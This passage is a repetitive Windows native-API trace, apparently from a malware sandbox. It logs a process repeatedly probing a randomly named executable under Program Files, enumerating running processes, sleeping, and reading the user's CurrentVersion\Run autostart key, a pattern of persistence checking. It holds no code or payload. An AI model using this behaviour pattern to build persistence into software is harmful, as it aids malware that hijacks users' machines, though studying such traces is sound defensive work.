| out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0267.983] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0267.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0267.984] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0267.984] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0267.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0267.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0268.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0268.454] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0268.517] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0268.517] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0268.517] NtClose (Handle=0x14c) returned 0x0 [0268.517] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0268.517] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0268.518] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0268.518] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0268.518] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0268.518] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0268.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0268.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0268.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0268.838] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0268.935] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0268.935] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0268.935] NtClose (Handle=0x14c) returned 0x0 [0268.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0268.935] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0268.935] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0268.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0268.935] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0268.936] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0268.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0268.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0269.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0269.254] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0269.367] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0269.367] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0269.367] NtClose (Handle=0x14c) returned 0x0 [0269.367] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0269.367] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0269.367] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0269.367] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0269.367] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0269.367] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0269.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0269.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0269.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0269.750] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0269.887] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0269.887] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0269.887] NtClose (Handle=0x14c) returned 0x0 [0269.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0269.887] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0269.887] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0269.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0269.887] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0269.888] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0269.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0269.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0270.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0270.217] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0270.321] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0270.322] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0270.322] NtClose (Handle=0x14c) returned 0x0 [0270.322] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.322] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0270.323] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0270.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.323] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0270.323] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0270.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0270.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0270.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0270.639] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0270.744] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0270.744] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0270.744] NtClose (Handle=0x14c) returned 0x0 [0270.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.744] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0270.744] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0270.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0270.744] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0270.744] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0270.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0270.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0270.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0270.942] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0271.055] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0271.055] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0271.055] NtClose (Handle=0x14c) returned 0x0 [0271.055] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0271.055] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0271.055] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0271.056] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0271.056] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0271.056] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0271.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0271.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0271.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0271.383] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0271.536] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, 